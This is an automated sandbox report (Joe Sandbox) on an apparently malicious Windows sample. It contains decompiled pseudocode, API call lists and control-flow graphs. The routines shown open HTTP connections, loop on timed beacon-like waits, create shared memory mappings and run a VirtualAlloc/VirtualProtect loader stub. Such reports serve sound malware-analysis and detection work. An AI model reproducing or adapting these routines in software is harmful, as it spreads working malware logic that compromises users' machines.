                						 *(__esi + 4) = _t56;
                					}
                				}
                				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                				 *(_t65 + 0x10) = _t34;
                				if(_t34 == 0 || InternetSetStatusCallback(_t34, E02227B18) == 0xffffffff) {
                					L15:
                					return GetLastError();
                				} else {
                					ResetEvent( *(_t65 + 0x1c));
                					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                					 *(_t65 + 0x14) = _t38;
                					if(_t38 != 0 || GetLastError() == 0x3e5 && E022216B2( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                						_t59 =  *0x222a348; // 0x9ad5a8
                						_t15 = _t59 + 0x222b845; // 0x544547
                						_v8 = 0x84404000;
                						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
                						 *(_t65 + 0x18) = _t40;
                						if(_t40 == 0) {
                							goto L15;
                						}
                						_t57 = 4;
                						_v12 = _t57;
                						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                							_v8 = _v8 | 0x00000100;
                							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                						}
                						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                							goto L15;
                						} else {
                							return 0;
                						}
                					} else {
                						goto L15;
                					}
                				}
                			}














                0x02227b83
                0x02227b83
                0x02227b8e
                0x02227b95
                0x02227b9d
                0x02227ba7
                0x02227bad
                0x02227bc0
                0x02227bd0
                0x02227bc2
                0x02227bc5
                0x02227bca
                0x02227bca
                0x02227bc0
                0x02227be0
                0x02227be6
                0x02227beb
                0x02227cd4
                0x00000000
                0x02227c06
                0x02227c09
                0x02227c1c
                0x02227c22
                0x02227c27
                0x02227c4f
                0x02227c62
                0x02227c6c
                0x02227c6f
                0x02227c75
                0x02227c7a
                0x00000000
                0x00000000
                0x02227c7e
                0x02227c8a
                0x02227c9b
                0x02227c9d
                0x02227cae
                0x02227cae
                0x02227cbe
                0x00000000
                0x02227cd0
                0x00000000
                0x02227cd0
                0x00000000
                0x00000000
                0x00000000
                0x02227c27

                APIs
                • lstrlen.KERNEL32(?,00000008,74CB4D40), ref: 02227B95
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 02227BB8
                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 02227BE0
                • InternetSetStatusCallback.WININET(00000000,02227B18), ref: 02227BF7
                • ResetEvent.KERNEL32(?), ref: 02227C09
                • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 02227C1C
                • GetLastError.KERNEL32 ref: 02227C29
                • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 02227C6F
                • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 02227C8D
                • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 02227CAE
                • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 02227CBA
                • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 02227CCA
                • GetLastError.KERNEL32 ref: 02227CD4
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                • String ID:
                • API String ID: 2290446683-0
                • Opcode ID: 0120bb947bf50629b0a1d8e667b0079b2f8137cb50797271430375d108b3796c
                • Instruction ID: 00bc165d04b4089a3104bf1ee082179cc540e8822ffdb4ce1b07f6b609021ae4
                • Opcode Fuzzy Hash: 0120bb947bf50629b0a1d8e667b0079b2f8137cb50797271430375d108b3796c
                • Instruction Fuzzy Hash: 76419D71910214BFEB319FE5DC4CE6BBBBDEB84704F101928F602E15A4E732A658CB20
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 111 2227fc5-222802a 112 222804b-2228075 111->112 113 222802c-2228046 RaiseException 111->113 115 2228077 112->115 116 222807a-2228086 112->116 114 22281fb-22281ff 113->114 115->116 117 2228088-2228093 116->117 118 2228099-222809b 116->118 117->118 126 22281de-22281e5 117->126 119 2228143-222814d 118->119 120 22280a1-22280a8 118->120 122 2228159-222815b 119->122 123 222814f-2228157 119->123 124 22280aa-22280b6 120->124 125 22280b8-22280c5 LoadLibraryA 120->125 127 22281d9-22281dc 122->127 128 222815d-2228160 122->128 123->122 124->125 130 2228108-2228114 InterlockedExchange 124->130 129 22280c7-22280d7 GetLastError 125->129 125->130 132 22281e7-22281f4 126->132 133 22281f9 126->133 127->126 135 2228162-2228165 128->135 136 222818e-222819c GetProcAddress 128->136 137 22280e7-2228103 RaiseException 129->137 138 22280d9-22280e5 129->138 139 2228116-222811a 130->139 140 222813c-222813d FreeLibrary 130->140 132->133 133->114 135->136 141 2228167-2228172 135->141 136->127 142 222819e-22281ae GetLastError 136->142 137->114 138->130 138->137 139->119 143 222811c-2228128 LocalAlloc 139->143 140->119 141->136 145 2228174-222817a 141->145 147 22281b0-22281b8 142->147 148 22281ba-22281bc 142->148 143->119 144 222812a-222813a 143->144 144->119 145->136 150 222817c-222817f 145->150 147->148 148->127 149 22281be-22281d6 RaiseException 148->149 149->127 150->136 152 2228181-222818c 150->152 152->127 152->136
                C-Code - Quality: 51%
                			E02227FC5(long _a4, long _a8) {
                				signed int _v8;
                				intOrPtr _v16;
                				LONG* _v28;
                				long _v40;
                				long _v44;
                				long _v48;
                				CHAR* _v52;
                				long _v56;
                				CHAR* _v60;
                				long _v64;
                				signed int* _v68;
                				char _v72;
                				signed int _t76;
                				signed int _t80;
                				signed int _t81;
                				intOrPtr* _t82;
                				intOrPtr* _t83;
                				intOrPtr* _t85;
                				intOrPtr* _t90;
                				intOrPtr* _t95;
                				intOrPtr* _t98;
                				struct HINSTANCE__* _t99;
                				void* _t102;
                				intOrPtr* _t104;
                				void* _t115;
                				long _t116;
                				void _t125;
                				void* _t131;
                				signed short _t133;
                				struct HINSTANCE__* _t138;
                				signed int* _t139;
                
                				_t139 = _a4;
                				_v28 = _t139[2] + 0x2220000;
                				_t115 = _t139[3] + 0x2220000;
                				_t131 = _t139[4] + 0x2220000;
                				_v8 = _t139[7];
                				_v60 = _t139[1] + 0x2220000;
                				_v16 = _t139[5] + 0x2220000;
                				_v64 = _a8;
                				_v72 = 0x24;
                				_v68 = _t139;
                				_v56 = 0;
                				asm("stosd");
                				_v48 = 0;
                				_v44 = 0;
                				_v40 = 0;
                				if(( *_t139 & 0x00000001) == 0) {
                					_a8 =  &_v72;
                					RaiseException(0xc06d0057, 0, 1,  &_a8);
                					return 0;
                				}
                				_t138 =  *_v28;
                				_t76 = _a8 - _t115 >> 2 << 2;
                				_t133 =  *(_t131 + _t76);
                				_a4 = _t76;
                				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                				_v56 = _t80;
                				_t81 = _t133 + 0x2220002;
                				if(_t80 == 0) {
                					_t81 = _t133 & 0x0000ffff;
                				}
                				_v52 = _t81;
                				_t82 =  *0x222a1c0; // 0x0
                				_t116 = 0;
                				if(_t82 == 0) {
                					L6:
                					if(_t138 != 0) {
                						L18:
                						_t83 =  *0x222a1c0; // 0x0
                						_v48 = _t138;
                						if(_t83 != 0) {
                							_t116 =  *_t83(2,  &_v72);
                						}
                						if(_t116 != 0) {
                							L32:
                							 *_a8 = _t116;
                							L33:
                							_t85 =  *0x222a1c0; // 0x0
                							if(_t85 != 0) {
                								_v40 = _v40 & 0x00000000;
                								_v48 = _t138;
                								_v44 = _t116;
                								 *_t85(5,  &_v72);
                							}
                							return _t116;
                						} else {
                							if(_t139[5] == _t116 || _t139[7] == _t116) {
                								L27:
                								_t116 = GetProcAddress(_t138, _v52);
                								if(_t116 == 0) {
                									_v40 = GetLastError();
                									_t90 =  *0x222a1bc; // 0x0
                									if(_t90 != 0) {
                										_t116 =  *_t90(4,  &_v72);
                									}
                									if(_t116 == 0) {
                										_a4 =  &_v72;
                										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                										_t116 = _v44;
                									}
                								}
                								goto L32;
                							} else {
                								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                									_t116 =  *(_a4 + _v16);
                									if(_t116 != 0) {
                										goto L32;
                									}
                								}
                								goto L27;
                							}
                						}
                					}
                					_t98 =  *0x222a1c0; // 0x0
                					if(_t98 == 0) {
                						L9:
                						_t99 = LoadLibraryA(_v60); // executed
                						_t138 = _t99;
                						if(_t138 != 0) {
                							L13:
                							if(InterlockedExchange(_v28, _t138) == _t138) {
                								FreeLibrary(_t138);
                							} else {
                								if(_t139[6] != 0) {
                									_t102 = LocalAlloc(0x40, 8);
                									if(_t102 != 0) {
                										 *(_t102 + 4) = _t139;
                										_t125 =  *0x222a1b8; // 0x0
                										 *_t102 = _t125;
                										 *0x222a1b8 = _t102;
                									}
                								}
                							}
                							goto L18;
                						}
                						_v40 = GetLastError();
                						_t104 =  *0x222a1bc; // 0x0
                						if(_t104 == 0) {
                							L12:
                							_a8 =  &_v72;
                							RaiseException(0xc06d007e, 0, 1,  &_a8);
                							return _v44;
                						}
                						_t138 =  *_t104(3,  &_v72);
                						if(_t138 != 0) {
                							goto L13;
                						}
                						goto L12;
                					}
                					_t138 =  *_t98(1,  &_v72);
                					if(_t138 != 0) {
                						goto L13;
                					}
                					goto L9;
                				}
                				_t116 =  *_t82(0,  &_v72);
                				if(_t116 != 0) {
                					goto L33;
                				}
                				goto L6;
                			}


































                0x02227fd4
                0x02227fea
                0x02227ff0
                0x02227ff2
                0x02227ff7
                0x02227ffd
                0x02228002
                0x02228005
                0x02228013
                0x0222801a
                0x0222801d
                0x02228020
                0x02228021
                0x02228024
                0x02228027
                0x0222802a
                0x0222802f
                0x0222803e
                0x00000000
                0x02228044
                0x0222804e
                0x02228058
                0x0222805d
                0x0222805f
                0x02228069
                0x0222806c
                0x0222806f
                0x02228075
                0x02228077
                0x02228077
                0x0222807a
                0x0222807d
                0x02228082
                0x02228086
                0x02228099
                0x0222809b
                0x02228143
                0x02228143
                0x0222814a
                0x0222814d
                0x02228157
                0x02228157
                0x0222815b
                0x022281d9
                0x022281dc
                0x022281de
                0x022281de
                0x022281e5
                0x022281e7
                0x022281f1
                0x022281f4
                0x022281f7
                0x022281f7
                0x00000000
                0x0222815d
                0x02228160
                0x0222818e
                0x02228198
                0x0222819c
                0x022281a4
                0x022281a7
                0x022281ae
                0x022281b8
                0x022281b8
                0x022281bc
                0x022281c1
                0x022281d0
                0x022281d6
                0x022281d6
                0x022281bc
                0x00000000
                0x02228167
                0x0222816a
                0x02228172
                0x02228187
                0x0222818c
                0x00000000
                0x00000000
                0x0222818c
                0x00000000
                0x02228172
                0x02228160
                0x0222815b
                0x022280a1
                0x022280a8
                0x022280b8
                0x022280bb
                0x022280c1
                0x022280c5
                0x02228108
                0x02228114
                0x0222813d
                0x02228116
                0x0222811a
                0x02228120
                0x02228128
                0x0222812a
                0x0222812d
                0x02228133
                0x02228135
                0x02228135
                0x02228128
                0x0222811a
                0x00000000
                0x02228114
                0x022280cd
                0x022280d0
                0x022280d7
                0x022280e7
                0x022280ea
                0x022280fa
                0x00000000
                0x02228100
                0x022280e1
                0x022280e5
                0x00000000
                0x00000000
                0x00000000
                0x022280e5
                0x022280b2
                0x022280b6
                0x00000000
                0x00000000
                0x00000000
                0x022280b6
                0x0222808f
                0x02228093
                0x00000000
                0x00000000
                0x00000000

                APIs
                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0222803E
                • LoadLibraryA.KERNELBASE(?), ref: 022280BB
                • GetLastError.KERNEL32 ref: 022280C7
                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 022280FA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                • String ID: $
                • API String ID: 948315288-3993045852
                • Opcode ID: cec0ae2a672caee7b5eae06432683825ca4fc10e8b6f89f680089c0aa7cb2b2c
                • Instruction ID: 7fcfa91b114444df3c2c448695687412ca875ac9c7fb517a91cda4e3af93b867
                • Opcode Fuzzy Hash: cec0ae2a672caee7b5eae06432683825ca4fc10e8b6f89f680089c0aa7cb2b2c
                • Instruction Fuzzy Hash: 68813071A10216BFDB20CFD8D884B9E77F5FB48310F154429E905D7294E772EA49CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 183 2226815-2226847 memset CreateWaitableTimerA 184 22269c8-22269ce GetLastError 183->184 185 222684d-22268a6 _allmul SetWaitableTimer WaitForMultipleObjects 183->185 186 22269d2-22269dc 184->186 187 2226930-2226936 185->187 188 22268ac-22268af 185->188 189 2226937-222693b 187->189 190 22268b1 call 2225251 188->190 191 22268ba 188->191 192 222694b-222694f 189->192 193 222693d-2226945 HeapFree 189->193 196 22268b6-22268b8 190->196 195 22268c4 191->195 192->189 197 2226951-222695b CloseHandle 192->197 193->192 198 22268c8-22268cd 195->198 196->191 196->195 197->186 199 22268e0-222690d call 22235d2 198->199 200 22268cf-22268d6 198->200 204 222690f-222691a 199->204 205 222695d-2226962 199->205 200->199 201 22268d8 200->201 201->199 204->198 206 222691c-222692c call 22269e6 204->206 207 2226981-2226989 205->207 208 2226964-222696a 205->208 206->187 211 222698f-22269bd _allmul SetWaitableTimer WaitForMultipleObjects 207->211 208->187 210 222696c-222697f call 22263f6 208->210 210->211 211->198 212 22269c3 211->212 212->187
                C-Code - Quality: 83%
                			E02226815(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                				void _v48;
                				long _v52;
                				struct %anon52 _v60;
                				char _v72;
                				long _v76;
                				void* _v80;
                				union _LARGE_INTEGER _v84;
                				struct %anon52 _v92;
                				void* _v96;
                				void* _v100;
                				union _LARGE_INTEGER _v104;
                				long _v108;
                				struct %anon52 _v124;
                				long _v128;
                				struct %anon52 _t46;
                				void* _t51;
                				long _t53;
                				void* _t54;
                				struct %anon52 _t61;
                				long _t65;
                				struct %anon52 _t66;
                				void* _t69;
                				void* _t73;
                				signed int _t74;
                				void* _t76;
                				void* _t78;
                				void** _t82;
                				signed int _t86;
                				void* _t89;
                
                				_t76 = __edx;
                				_v52 = 0;
                				memset( &_v48, 0, 0x2c);
                				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                				_t46 = CreateWaitableTimerA(0, 1, 0);
                				_v60 = _t46;
                				if(_t46 == 0) {
                					_v92.HighPart = GetLastError();
                				} else {
                					_push(0xffffffff);
                					_push(0xff676980);
                					_push(0);
                					_push( *0x222a2e0);
                					_v76 = 0;
                					_v80 = 0;
                					L022282DA();
                					_v84.LowPart = _t46;
                					_v80 = _t76;
                					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                					_t51 =  *0x222a30c; // 0x1b0
                					_v76 = _t51;
                					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                					_v108 = _t53;
                					if(_t53 == 0) {
                						if(_a8 != 0) {
                							L4:
                							 *0x222a2ec = 5;
                						} else {
                							_t69 = E02225251(_t76); // executed
                							if(_t69 != 0) {
                								goto L4;
                							}
                						}
                						_v104.LowPart = 0;
                						L6:
                						L6:
                						if(_v104.LowPart == 1 && ( *0x222a300 & 0x00000001) == 0) {
                							_v104.LowPart = 2;
                						}
                						_t74 = _v104.LowPart;
                						_t58 = _t74 << 4;
                						_t78 = _t89 + (_t74 << 4) + 0x38;
                						_t75 = _t74 + 1;
                						_v92.LowPart = _t74 + 1;
                						_t61 = E022235D2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100);
                						_v124 = _t61;
                						if(_t61 != 0) {
                							goto L17;
                						}
                						_t66 = _v92;
                						_v104.LowPart = _t66;
                						if(_t66 != 3) {
                							goto L6;
                						} else {
                							_v124.HighPart = E022269E6(_t75,  &_v72, _a4, _a8);
                						}
                						goto L12;
                						L17:
                						__eflags = _t61 - 0x10d2;
                						if(_t61 != 0x10d2) {
                							_push(0xffffffff);
                							_push(0xff676980);
                							_push(0);
                							_push( *0x222a2e4);
                							goto L21;
                						} else {
                							__eflags =  *0x222a2e8; // 0x0
                							if(__eflags == 0) {
                								goto L12;
                							} else {
                								_t61 = E022263F6();
                								_push(0xffffffff);
                								_push(0xdc3cba00);
                								_push(0);
                								_push( *0x222a2e8);
                								L21:
                								L022282DA();
                								_v104.LowPart = _t61;
                								_v100 = _t78;
                								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                								_v128 = _t65;
                								__eflags = _t65;
                								if(_t65 == 0) {
                									goto L6;
                								} else {
                									goto L12;
                								}
                							}
                						}
                						L25:
                					}
                					L12:
                					_t82 =  &_v72;
                					_t73 = 3;
                					do {
                						_t54 =  *_t82;
                						if(_t54 != 0) {
                							HeapFree( *0x222a2d8, 0, _t54);
                						}
                						_t82 =  &(_t82[4]);
                						_t73 = _t73 - 1;
                					} while (_t73 != 0);
                					CloseHandle(_v80);
                				}
                				return _v92.HighPart;
                				goto L25;
                			}
































                0x02226815
                0x0222682b
                0x0222682f
                0x02226834
                0x0222683b
                0x02226841
                0x02226847
                0x022269ce
                0x0222684d
                0x0222684d
                0x0222684f
                0x02226854
                0x02226855
                0x0222685b
                0x0222685f
                0x02226863
                0x02226871
                0x0222687f
                0x02226883
                0x02226885
                0x02226892
                0x0222689e
                0x022268a0
                0x022268a6
                0x022268af
                0x022268ba
                0x022268ba
                0x022268b1
                0x022268b1
                0x022268b8
                0x00000000
                0x00000000
                0x022268b8
                0x022268c4
                0x00000000
                0x022268c8
                0x022268cd
                0x022268d8
                0x022268d8
                0x022268e0
                0x022268e6
                0x022268ee
                0x022268f7
                0x022268fe
                0x02226902
                0x02226907
                0x0222690d
                0x00000000
                0x00000000
                0x0222690f
                0x02226913
                0x0222691a
                0x00000000
                0x0222691c
                0x0222692c
                0x0222692c
                0x00000000
                0x0222695d
                0x0222695d
                0x02226962
                0x02226981
                0x02226983
                0x02226988
                0x02226989
                0x00000000
                0x02226964
                0x02226964
                0x0222696a
                0x00000000
                0x0222696c
                0x0222696c
                0x02226971
                0x02226973
                0x02226978
                0x02226979
                0x0222698f
                0x0222698f
                0x02226997
                0x022269a5
                0x022269a9
                0x022269b5
                0x022269b7
                0x022269bb
                0x022269bd
                0x00000000
                0x022269c3
                0x00000000
                0x022269c3
                0x022269bd
                0x0222696a
                0x00000000
                0x02226962
                0x02226930
                0x02226932
                0x02226936
                0x02226937
                0x02226937
                0x0222693b
                0x02226945
                0x02226945
                0x0222694b
                0x0222694e
                0x0222694e
                0x02226955
                0x02226955
                0x022269dc
                0x00000000

                APIs
                • memset.NTDLL ref: 0222682F
                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0222683B
                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 02226863
                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02226883
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,022226E9,?), ref: 0222689E
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,022226E9,?,00000000), ref: 02226945
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,022226E9,?,00000000,?,?), ref: 02226955
                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0222698F
                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 022269A9
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 022269B5
                  • Part of subcall function 02225251: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02BD9218,00000000,?,74D0F710,00000000,74D0F730), ref: 022252A0
                  • Part of subcall function 02225251: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02BD9160,?,00000000,30314549,00000014,004F0053,02BD9270), ref: 0222533D
                  • Part of subcall function 02225251: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,022268B6), ref: 0222534F
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,022226E9,?,00000000,?,?), ref: 022269C8
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                • String ID:
                • API String ID: 3521023985-0
                • Opcode ID: f7c06391faadfa490bc35c1d0f5e1d7965e67416164abff347a6ac83be9f164d
                • Instruction ID: 8cf96a5c9a839e3f8699709e9d3d790e4a779ace8eb1a2c50e8a1a513d8b180e
                • Opcode Fuzzy Hash: f7c06391faadfa490bc35c1d0f5e1d7965e67416164abff347a6ac83be9f164d
                • Instruction Fuzzy Hash: 8D519172819321BFC720AF95DC48DABBBECEB84320F504A1AF89592194D772D55CCF92
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 74%
                			E0222415A(intOrPtr __edx, void** _a4, void** _a8) {
                				intOrPtr _v8;
                				struct _FILETIME* _v12;
                				short _v56;
                				struct _FILETIME* _t12;
                				intOrPtr _t13;
                				void* _t17;
                				void* _t21;
                				intOrPtr _t27;
                				long _t28;
                				void* _t30;
                
                				_t27 = __edx;
                				_t12 =  &_v12;
                				GetSystemTimeAsFileTime(_t12);
                				_push(0x192);
                				_push(0x54d38000);
                				_push(_v8);
                				_push(_v12);
                				L022282D4();
                				_push(_t12);
                				_v12 = _t12;
                				_t13 =  *0x222a348; // 0x9ad5a8
                				_t5 = _t13 + 0x222b7b4; // 0x2bd8d5c
                				_t6 = _t13 + 0x222b644; // 0x530025
                				_push(0x16);
                				_push( &_v56);
                				_v8 = _t27;
                				L02227F3A();
                				_t17 = CreateFileMappingW(0xffffffff, 0x222a34c, 4, 0, 0x1000,  &_v56); // executed
                				_t30 = _t17;
                				if(_t30 == 0) {
                					_t28 = GetLastError();
                				} else {
                					if(GetLastError() == 0xb7) {
                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                						if(_t21 == 0) {
                							_t28 = GetLastError();
                							if(_t28 != 0) {
                								goto L6;
                							}
                						} else {
                							 *_a4 = _t30;
                							 *_a8 = _t21;
                							_t28 = 0;
                						}
                					} else {
                						_t28 = 2;
                						L6:
                						CloseHandle(_t30);
                					}
                				}
                				return _t28;
                			}













                0x0222415a
                0x02224162
                0x02224166
                0x0222416c
                0x02224171
                0x02224176
                0x02224179
                0x0222417c
                0x02224181
                0x02224182
                0x02224185
                0x0222418a
                0x02224191
                0x0222419b
                0x0222419d
                0x0222419e
                0x022241a1
                0x022241bd
                0x022241c3
                0x022241c7
                0x02224215
                0x022241c9
                0x022241d6
                0x022241e6
                0x022241ee
                0x02224200
                0x02224204
                0x00000000
                0x00000000
                0x022241f0
                0x022241f3
                0x022241f8
                0x022241fa
                0x022241fa
                0x022241d8
                0x022241da
                0x02224206
                0x02224207
                0x02224207
                0x022241d6
                0x0222421c

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,022225B1,?,?,4D283A53,?,?), ref: 02224166
                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0222417C
                • _snwprintf.NTDLL ref: 022241A1
                • CreateFileMappingW.KERNELBASE(000000FF,0222A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 022241BD
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,022225B1,?,?,4D283A53,?), ref: 022241CF
                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 022241E6
                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,022225B1,?,?,4D283A53), ref: 02224207
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,022225B1,?,?,4D283A53,?), ref: 0222420F
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID:
                • API String ID: 1814172918-0
                • Opcode ID: 1a5a4ac9fbd124bc9825f0bc7e7376f04c2218791d5f3cc49714e5c5280f2975
                • Instruction ID: 489410de2556462a1b8d69b2863cad7811bd6135dc1df7db5cbfe6cd43e3f837
                • Opcode Fuzzy Hash: 1a5a4ac9fbd124bc9825f0bc7e7376f04c2218791d5f3cc49714e5c5280f2975
                • Instruction Fuzzy Hash: 21212B72950328BBD720EBE4DC09F9D37B9AB84704F220120F509E7194D7B29A4DCB50
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 225 50003c-500047 226 500049 225->226 227 50004c-500263 call 500a3f call 500e0f call 500d90 VirtualAlloc 225->227 226->227 243 500265-500289 call 500a69 227->243 244 50028b-500292 227->244 249 5002ce-5003c2 VirtualProtect call 500cce call 500ce7 243->249 246 5002a1-5002b0 244->246 248 5002b2-5002cc 246->248 246->249 248->249 251 500294-50029b 248->251 255 5003d1-5003e0 249->255 251->246 256 5003e2-500437 call 500ce7 255->256 257 500439-5004b8 VirtualFree 255->257 256->255 258 5005f4-5005fe 257->258 259 5004be-5004cd 257->259 262 500604-50060d 258->262 263 50077f-500789 258->263 261 5004d3-5004dd 259->261 261->258 267 5004e3-500505 LoadLibraryA 261->267 262->263 268 500613-500637 262->268 265 5007a6-5007b0 263->265 266 50078b-5007a3 263->266 270 5007b6-5007cb 265->270 271 50086e-5008be LoadLibraryA 265->271 266->265 272 500517-500520 267->272 273 500507-500515 267->273 274 50063e-500648 268->274 275 5007d2-5007d5 270->275 278 5008c7-5008f9 271->278 276 500526-500547 272->276 273->276 274->263 277 50064e-50065a 274->277 279 500824-500833 275->279 280 5007d7-5007e0 275->280 281 50054d-500550 276->281 277->263 282 500660-50066a 277->282 283 500902-50091d 278->283 284 5008fb-500901 278->284 290 500839-50083c 279->290 285 5007e2 280->285 286 5007e4-500822 280->286 287 5005e0-5005ef 281->287 288 500556-50056b 281->288 289 50067a-500689 282->289 284->283 285->279 286->275 287->261 294 50056d 288->294 295 50056f-50057a 288->295 291 500750-50077a 289->291 292 50068f-5006b2 289->292 290->271 293 50083e-500847 290->293 291->274 298 5006b4-5006ed 292->298 299 5006ef-5006fc 292->299 300 500849 293->300 301 50084b-50086c 293->301 294->287 296 50059b-5005bb 295->296 297 50057c-500599 295->297 309 5005bd-5005db 296->309 297->309 298->299 303 50074b 299->303 304 5006fe-500748 299->304 300->271 301->290 303->289 304->303 309->281
                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0050024D
                Strings
